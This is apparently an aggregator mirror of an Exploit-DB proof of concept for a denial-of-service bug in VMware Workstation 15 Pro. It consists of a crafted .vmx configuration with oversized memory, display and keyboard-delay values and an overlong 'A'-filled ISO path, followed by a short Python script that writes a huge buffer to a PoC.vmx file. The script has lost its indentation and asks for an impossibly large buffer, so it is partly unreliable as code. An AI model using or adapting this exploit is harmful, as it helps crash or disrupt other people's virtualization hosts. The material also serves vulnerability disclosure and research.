8
[dos] VMware Workstation 15 Pro - Denial of Service
source link: https://www.exploit-db.com/exploits/51100
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
VMware Workstation 15 Pro - Denial of Service
#Title: VMware Workstation 15 Pro - Denial of Service
#Author: Milad Karimi
#Date: 2022-10-17
#Tested on: Windows 10 Pro and Windows 7 Pro (SP1) with VMware® Workstation 15 Pro (15.5.6 build-16341506)
#Affected: VMware Workstation Pro/Player 15.x
config.version = "8"
virtualHW.version = "4"
displayName = "credit's to Ex3ptionaL for find this vouln"
annotation = "Live CD ISO http://www.irongeek.com"
guestinfo.vmware.product.long = "credit's to Ex3ptionaL for find this vouln"
guestinfo.vmware.product.url = "http://www.millw0rm.com"
guestinfo.vmware.product.short = "LCDI"
guestinfo.vmware.product.version.major = "1"
guestinfo.vmware.product.version.minor = "0"
guestinfo.vmware.product.version.revision = "0"
guestinfo.vmware.product.version.type = "release"
guestinfo.vmware.product.class = "virtual machine"
guestinfo.vmware.product.build = "1.0.0rc8-20051212"
uuid.action = "create"
guestOS = "winxppro"
#####
# Memory
#####
memsize = "20000000000000"
# memsize = "300000000000000000000000000000"
# memsize = "400000000000000000000"
# memsize = "700000000000000000000000000000000000"
#
# Alternative larger memory allocations
#####
# USB
#####
usb.present = "TRUE"
#####
# Floppy
#####
floppy0.present = "FALSE"
#####
# IDE Storage
#####
ide1:0.present = "TRUE"
#Edit line below to change ISO to boot from
ide1:0.fileName = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.iso"
ide1:0.deviceType = "cdrom-image"
ide1:0.startConnected = "TRUE"
ide1:0.autodetect = "TRUE"
#####
# Network
#####
ethernet0.present = "TRUE"
ethernet0.connectionType = "nat"
# ethernet0.connectionType = "bridged"
#
# Switch these two to enable "Bridged" vs. "NAT"
#####
# Sound
#####
sound.present = "TRUE"
sound.virtualDev = "es1371"
sound.autoDetect = "TRUE"
sound.fileName = "-1"
#####
# Misc.
#
# (normal) high
priority.grabbed = "high"
tools.syncTime = "TRUE"
workingDir = "."
#
# (16) 32 64
sched.mem.pShare.checkRate = "32"
#
# (32) 64 128
sched.mem.pshare.scanRate = "64"
#
# Higher resolution lockout, adjust values to exceed 800x600
svga.maxWidth = "8000000000000000000"
svga.maxHeight = "6000000000000000000"
#
# (F) T
isolation.tools.dnd.disable = "FALSE"
#
# (F) T
isolation.tools.hgfs.disable = "FALSE"
#
# (F) T
isolation.tools.copy.disable = "FALSE"
#
# (F) T
isolation.tools.paste.disable = "FALSE"
#
# (T) F
logging = "TRUE"
#
#
# (F) T
log.append = "FALSE"
#
# (3) number of older files kept
log.keepOld = "1"
#
# (0) microseconds
keyboard.typematicMinDelay = 100000000000000000
uuid.location = "56 4d f1 ae 7b ed fe a2-e2 0d 49 3d 6d 3c d4 4a"
uuid.bios = "56 4d f1 ae 7b ed fe a2-e2 0d 49 3d 6d 3c d4 4a"
ethernet0.addressType = "generated"
ethernet0.generatedAddress = "00:0c:29:3c:d4:4a"
ethernet0.generatedAddressOffset = "0"
checkpoint.vmState = "live-cd-iso.vmss"
tools.remindInstall = "TRUE"
Exploit code()
buffer = "A" * 118000000000000000
payload = buffer
try:
f=open("PoC.vmx","w")
print "[+] Creating %s evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK